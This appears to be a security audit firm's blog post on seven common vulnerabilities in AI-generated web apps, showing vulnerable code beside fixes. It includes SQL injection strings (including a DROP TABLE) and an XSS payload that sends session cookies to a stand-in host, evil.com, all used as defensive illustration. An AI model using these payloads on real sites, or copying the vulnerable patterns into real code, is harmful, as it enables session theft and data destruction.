Security Holes Every Vibe-Coded App Has
You built your app with AI. It looks great, it works, users are signing up. But there's a problem you can't see from the UI: your app is almost certainly riddled with security holes.
This isn't a criticism of AI tools. They're optimized for getting features working, not for defense in depth. Security is adversarial thinking — anticipating how someone will try to break your system. AI code generators don't think like attackers. They think like demo builders.
Here are the seven security vulnerabilities we find in virtually every vibe-coded app we audit. Each one is exploitable, and each one has a straightforward fix.
1. Exposed Environment Variables
This is the most common and most dangerous vulnerability. AI tools frequently hardcode API keys, database credentials, and secret tokens directly in source code.
What it looks like:
// This is in your public GitHub repo right now
const stripe = new Stripe('sk_live_abc123realkey...')
const dbUrl = 'postgresql://admin:password123@db.example.com:5432/prod'
If your code is in a public repository, automated bots are already scanning for these. If it's in a private repo, a single compromised developer account exposes everything.
Even .env files aren't safe if they're committed to git. We regularly find production database passwords in git history.
The fix:
- Never hardcode secrets. Use environment variables loaded from
.envfiles that are in.gitignore - For production, use a secrets manager (AWS Secrets Manager, Vault, or even encrypted environment variables in your hosting platform)
- Audit your git history:
git log --all -p | grep -i "password\|secret\|api_key"— if you find anything, rotate those credentials immediately - Use different credentials for every environment
2. No Input Validation
AI-generated backends accept whatever data you send them. No type checking, no length limits, no format validation. Every input field is a potential attack vector.
What it looks like:
// AI-generated: trusts all input
app.post('/api/users', async (req, res) => {
const user = await db.user.create({ data: req.body })
res.json(user)
})
An attacker can send { "role": "admin", "email": "anything" } and your app will happily create an admin user. Or send a 10MB string in the name field and crash your server.
The fix:
// Production-ready: validates everything
import { z } from 'zod'
const CreateUserSchema = z.object({
email: z.string().email().max(255),
name: z.string().min(1).max(100),
// role is NOT accepted from input
})
app.post('/api/users', async (req, res) => {
const data = CreateUserSchema.parse(req.body)
const user = await db.user.create({ data })
res.json(user)
})
Use Zod (TypeScript), Pydantic (Python), or your language's equivalent. Validate every input on every endpoint. Never trust the client.
3. Default Credentials and Open Admin Panels
AI tools scaffold admin panels with default usernames and passwords. Sometimes they don't even add authentication to admin routes at all.
We've audited apps where /admin was accessible to anyone who typed the URL. No login required. Full access to user data, configuration, and database operations.
What to check:
- Is your admin panel protected by authentication?
- Did you change the default admin credentials?
- Is the admin panel accessible from the public internet, or only from your internal network?
- Does admin access require multi-factor authentication?
The fix: At minimum, put your admin panel behind authentication with a strong, unique password. Ideally, restrict admin access to specific IP addresses or a VPN. Add MFA for any account with admin privileges.
4. Missing CORS Configuration
Cross-Origin Resource Sharing (CORS) controls which domains can make requests to your API. AI-generated apps typically set CORS to * — meaning any website on the internet can make authenticated requests to your backend.
What it looks like:
// AI-generated: allows everything
app.use(cors({ origin: '*' }))
This means an attacker can build a malicious website that makes requests to your API using your users' cookies. If a logged-in user visits the attacker's site, the attacker can act as that user.
The fix:
// Production-ready: whitelist your domains
app.use(cors({
origin: ['https://yourapp.com', 'https://app.yourapp.com'],
credentials: true,
}))
Only allow origins you control. Be explicit. In development, you can add localhost, but never ship * to production.
5. No Rate Limiting
Without rate limiting, your API is an all-you-can-eat buffet for attackers. Brute force login attempts, credential stuffing, API scraping, denial of service — all trivially easy when there are no limits.
What's at risk:
- Login endpoints — an attacker can try thousands of passwords per minute
- Password reset — send thousands of reset emails to harass your users
- API endpoints — scrape all your data or run up your infrastructure costs
- Signup — create thousands of fake accounts
The fix:
import rateLimit from 'express-rate-limit'
// General API rate limit
app.use('/api/', rateLimit({
windowMs: 15 * 60 * 1000, // 15 minutes
max: 100, // 100 requests per window
}))
// Stricter limit on auth endpoints
app.use('/api/auth/', rateLimit({
windowMs: 15 * 60 * 1000,
max: 10, // 10 attempts per 15 minutes
}))
At minimum, rate limit your authentication endpoints. Ideally, rate limit everything with sensible defaults.
6. SQL Injection
You'd think this was a solved problem in 2026. It's not. AI-generated code still builds SQL queries by concatenating strings, especially in search, filtering, and reporting features.
What it looks like:
// AI-generated: SQL injection vulnerable
app.get('/api/users', async (req, res) => {
const users = await db.$queryRaw(
`SELECT * FROM users WHERE name LIKE '%${req.query.search}%'`
)
res.json(users)
})
An attacker sends search=' OR '1'='1' -- and gets your entire user table. Or worse: search='; DROP TABLE users; --.
The fix:
// Production-ready: parameterized query
app.get('/api/users', async (req, res) => {
const users = await db.$queryRaw(
Prisma.sql`SELECT * FROM users WHERE name LIKE ${`%${req.query.search}%`}`
)
res.json(users)
})
Always use parameterized queries or your ORM's built-in query builder. Never concatenate user input into SQL strings. This rule has zero exceptions.
7. Cross-Site Scripting (XSS)
AI-generated apps frequently render user-provided content without sanitization. If a user can input text that gets displayed to other users — comments, profiles, messages — XSS is almost guaranteed.
What it looks like:
// AI-generated: XSS vulnerable
function Comment({ text }) {
return <div dangerouslySetInnerHTML={{ __html: text }} />
}
An attacker submits a comment containing <script>document.location='https://evil.com/steal?cookie='+document.cookie</script> and steals every user's session who views that comment.
The fix:
- Never use
dangerouslySetInnerHTMLwith user content - React escapes content by default — don't bypass it
- If you must render HTML, use a sanitization library like DOMPurify
- Set Content Security Policy headers to prevent inline script execution
// Production-ready: escaped by default
function Comment({ text }) {
return <div>{text}</div>
}
The Compound Risk
Each vulnerability on its own is a problem. Together, they're catastrophic. An attacker finds your exposed API key (vulnerability 1), uses the lack of rate limiting (vulnerability 5) to enumerate users through the unvalidated API (vulnerability 2), and escalates to admin access through the default credentials (vulnerability 3).
Security is a chain. AI tools don't think in chains. They think in features.
What To Do Right Now
- Search your codebase for hardcoded secrets. Rotate any you find.
- Add input validation to every API endpoint.
- Configure CORS to only allow your domains.
- Add rate limiting to authentication endpoints at minimum.
- Run
npm auditand fix critical vulnerabilities.
This will take a day. It could save your company.
If you want a thorough review, book a free Quick Audit. We'll scan your codebase for these vulnerabilities and more, and give you a prioritized fix list. Also check our complete MVP to production checklist for the full picture.